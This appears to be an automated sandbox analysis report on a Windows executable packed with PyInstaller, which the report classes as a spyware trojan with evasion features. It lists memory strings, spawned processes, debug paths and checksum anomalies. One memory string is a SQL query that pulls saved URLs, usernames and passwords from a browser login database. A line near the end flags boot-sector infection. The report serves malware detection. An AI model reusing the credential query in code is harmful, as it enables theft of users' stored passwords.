Source: PAP46E1UkZ.exe, 00000000.00000003.374104729.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepywintypes39.dll0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.375054873.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshell.pyd0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370000416.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369502609.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.367254668.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.375172920.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32trace.pyd0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369309676.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369950391.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370046126.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.374488836.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370270548.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.373990099.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepythoncom39.dll0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.368384708.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_win32sysloader.pyd0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369111351.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.368965422.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369438124.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369261447.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369855733.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.374917279.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.368017381.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369546989.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370541114.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369017279.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.367469631.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370496162.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.366840408.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.368523087.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.369632521.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.370444387.00000293619B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs PAP46E1UkZ.exe
Source: PAP46E1UkZ.exe, 00000000.00000003.375172920.00000293619C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32trace.pyd0 vs PAP46E1UkZ.exe
Source: _pytransform.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: PAP46E1UkZ.exeVirustotal: Detection: 7%
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Users\user\Desktop\PAP46E1UkZ.exeJump to behavior
Source: PAP46E1UkZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PAP46E1UkZ.exe C:\Users\user\Desktop\PAP46E1UkZ.exe
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Users\user\Desktop\PAP46E1UkZ.exe C:\Users\user\Desktop\PAP46E1UkZ.exe
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Users\user\Desktop\PAP46E1UkZ.exe C:\Users\user\Desktop\PAP46E1UkZ.exeJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70922Jump to behavior
Source: classification engineClassification label: mal72.troj.spyw.evad.winEXE@6/138@7/7
Source: PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 0_2_00007FF735C46DD0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF735C46DD0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
Source: PAP46E1UkZ.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: PAP46E1UkZ.exeStatic file information: File size 17968187 > 1048576
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PAP46E1UkZ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: PAP46E1UkZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370230553.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370444387.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368702004.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367629377.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, _overlapped.pyd.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369111351.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368523087.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:34:57 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369855733.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370146089.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367915636.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370496162.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366840408.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367469631.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368913569.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369950391.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369632521.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370097645.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368572076.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369309676.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368414134.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368624931.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\pywintypes.pdb source: pywintypes39.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370046126.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368017381.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366897365.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: PAP46E1UkZ.exe, 00000000.00000003.374720243.00000293619BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369438124.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370576743.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368861535.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: PAP46E1UkZ.exe, 00000000.00000003.374157259.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: PAP46E1UkZ.exe, 00000000.00000003.367469631.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_uuid.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368280762.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\win32trace.pdb source: PAP46E1UkZ.exe, 00000000.00000003.375172920.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369675992.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb?? source: libssl-1_1.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367556854.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\_win32sysloader.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368384708.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.368366043.00000293619BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369261447.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368462502.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370000416.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.9\Release\pywintypes.pdb( source: pywintypes39.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369063487.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370270548.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: PAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369369683.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369179240.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370372039.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370625908.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369502609.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369902126.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369546989.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368750124.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370409288.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.369017279.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: PAP46E1UkZ.exe, 00000000.00000003.373297982.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.368965422.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370189096.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PAP46E1UkZ.exe, 00000000.00000003.370541114.00000293619B5000.00000004.00000020.00020000.00000000.sdmp
Source: PAP46E1UkZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: PAP46E1UkZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: PAP46E1UkZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: PAP46E1UkZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: PAP46E1UkZ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: PAP46E1UkZ.exeStatic PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: _pytransform.dll.0.drStatic PE information: section name: .xdata
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: mfc140u.dll.0.drStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\PAP46E1UkZ.exeCode function: 1_2_70A701A0 LoadLibraryA,GetProcAddress,GetCurrentThread,RtlWow64SetThreadContext,1_2_70A701A0
Source: _MD5.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x78ef
Source: _scrypt.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x6264
Source: _raw_blowfish.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14707
Source: _pkcs1_decode.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdf97
Source: _raw_cbc.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x61aa
Source: _raw_ctr.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x6811
Source: _raw_cast.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1233a
Source: _modexp.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xbb3b
Source: _Salsa20.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x6b4a
Source: _RIPEMD160.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x93ff
Source: _cpuid_c.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x119a2
Source: _BLAKE2b.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x10a9c
Source: _raw_aesni.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd9cc
Source: _win32sysloader.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xe607
Source: _raw_des.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1b325
Source: win32trace.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x690b
Source: _MD4.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9941
Source: _ed25519.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x162e1
Source: _raw_eksblowfish.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x57cb
Source: _pytransform.dll.0.drStatic PE information: real checksum: 0x125f95 should be: 0x1255df
Source: _ghash_portable.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1222d
Source: _SHA512.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12bc6
Source: pythoncom39.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x955de
Source: _cffi_backend.cp39-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x38278
Source: _x25519.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x6f22
Source: _SHA256.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdec6
Source: pywintypes39.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x2bc3c
Source: _chacha20.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xe980
Source: _SHA1.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12726
Source: win32api.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x243bd
Source: _openssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x3d47ba
Source: _MD2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x521e
Source: _raw_arc2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x125a8
Source: _ghash_clmul.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x80b4
Source: _SHA384.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd088
Source: _BLAKE2s.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x96b6
Source: _poly1305.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x128fb
Source: _SHA224.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x738b
Source: _raw_aes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9538
Source: _raw_ecb.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8197
Source: _raw_ocb.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x63e2
Source: _ed448.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16aa5
Source: _raw_cfb.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x42ac
Source: shell.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8e959
Source: _rust.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x197aa8
Source: _raw_des3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17c5e
Source: _strxor.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xa425
Source: _raw_ofb.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd233
Source: _ec_ws.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xbc973
Source: _keccak.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1116e
Source: _ARC4.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xae96
Source: win32ui.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x168733
Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: 0xF3E5BA0F [Tue Sep 1 04:07:43 2099 UTC]

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
